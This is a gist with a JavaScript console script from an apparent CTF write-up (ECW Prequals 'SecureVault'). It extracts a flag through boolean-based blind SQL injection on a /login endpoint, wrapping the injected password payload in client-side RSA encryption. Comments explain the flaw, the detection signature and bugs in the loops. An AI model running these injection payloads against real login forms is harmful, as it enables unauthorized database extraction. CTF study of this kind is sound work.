@LoadLow
Last active October 22, 2019 13:38
ECW Prequals - Challenge "SecureVault"
// Browser-console script from a CTF write-up: a boolean-based blind SQL
// injection against the challenge's /login endpoint, read one character of
// `flag` at a time by binary search over the printable ASCII range.
// Relies on JSEncrypt and jQuery ($) already being loaded on the page.
//
// Defender's reading of what makes this work and where it is visible:
//  - the JSON login body is RSA-encrypted client-side with the server's own
//    public key (#pubkey), so the SQL fragment never appears in cleartext in
//    the HTTP body; request-body inspection alone would presumably not see it.
//  - the oracle is the difference in response text ("Welcome back!" vs. not),
//    i.e. the login handler interpolates `passwd` into SQL instead of using a
//    parameterized query. Parameterizing the query removes the whole channel.
//  - the traffic signature is a burst of synchronous POST /login requests for
//    the same email ('admin'), roughly three per probed character, which is
//    an easy rate-limit / anomaly-detection target.
var encrypt = new JSEncrypt();
encrypt.setPublicKey($('#pubkey').val());
var fnd = false; // never read below
// Outer loop: restarts the whole search 1000 times; nothing breaks out of it.
for(var i = 0; i < 1000; ++i) {
// Search space for each character: printable ASCII 0x20 (space) .. 126 ('~').
var asciimin = 0x20;
var asciimax = 126
var min;
var max;
var foundvalue = ""; // characters recovered so far, in order
// Middle loop: one iteration per recovered character; its only exit is
// reaching 1000 characters — there is no check for end of the flag.
for(; foundvalue.length < 1000;) {
min=asciimin;
max=asciimax;
var remainingchars = foundvalue.length - 1; // unused
var nextchar = foundvalue.length + 1; // 1-based position for SQL substr()
console.log("Searching " + foundvalue + "...");
// Inner loop: binary search on one character position. Exits only via the
// `break` below when an equality probe succeeds; if the character is outside
// [min, max] (e.g. non-printable, or end of string) min can pass max and this
// loop never terminates.
for(;;) {
var pivot = parseInt(((min + max)/2)); // midpoint (parseInt on a number; Math.floor equivalent here)
// Probe 1: is the next character exactly CHAR(pivot)?
var pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)=CHAR('+pivot+'))';
// The injection: a quote closes the password literal, OR appends the probe
// tied to id=1, and /* comments out the rest of the original query.
var jsonlogin = {
"email": 'admin',
"passwd": "' OR (id=1 AND "+ pld + ") /*"
}
var encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
// async:false blocks the console until the response is back (deprecated
// jQuery behaviour, but it keeps the search strictly sequential).
var result = $.ajax({
type: 'POST',
url: '/login',
data: {encrypted:encrypted},
async:false
});
// Oracle: the login page's success banner leaks the truth of the probe.
if(result.responseText.includes('Welcome back!')) {
foundvalue += String.fromCharCode(pivot);
break;
}
// Probe 2: char >= CHAR(min). Overwrites `result` from probe 1.
pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)>=CHAR('+ min +'))';
jsonlogin = {
"email": 'admin',
"passwd": "' OR (id=1 AND "+ pld + ") /*"
}
encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
result = $.ajax({
type: 'POST',
url: '/login',
data: {encrypted:encrypted},
async:false
});
// Probe 3: char < CHAR(pivot). (Note the missing space before /* compared
// with the two payloads above; harmless for the SQL comment.)
pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)<CHAR('+ pivot +'))';
jsonlogin = {
"email": 'admin',
"passwd": "' OR (id=1 AND "+ pld + ")/*"
}
encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
var result2 = $.ajax({
type: 'POST',
url: '/login',
data: {encrypted:encrypted},
async:false
});
// min <= char < pivot  -> search the lower half; otherwise the upper half.
// Probe 2 is redundant with the invariant min <= char maintained by the
// search, so the decision effectively rests on probe 3 alone.
if (result.responseText.includes('Welcome back!') && result2.responseText.includes('Welcome back!'))
max=pivot-1;
else
min=pivot+1;
}
}
}